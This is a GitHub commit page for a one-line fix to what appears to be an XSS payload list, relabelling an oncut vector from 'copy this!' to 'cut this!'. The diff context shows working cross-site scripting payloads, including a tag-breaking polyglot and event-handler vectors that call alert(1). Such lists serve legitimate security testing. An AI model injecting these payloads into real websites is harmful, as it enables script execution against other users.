Copy this -> Cut this

Change copy to cut instruction
This commit is contained in:
Minh Triet Pham Tran 2019-12-02 12:59:54 +07:00 committed by GitHub
parent c60f264664
commit f44d014fc2
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23

View File

@ -63,7 +63,7 @@ javascript://--></title></style></textarea></script><svg "//' onclick=alert()//
<x onclick=alert(1)>click this!
<x oncopy=alert(1)>copy this!
<x oncontextmenu=alert(1)>right click this!
<x oncut=alert(1)>copy this!
<x oncut=alert(1)>cut this!
<x ondblclick=alert(1)>double click this!
<x ondrag=alert(1)>drag this!
<x contenteditable onfocus=alert(1)>focus this!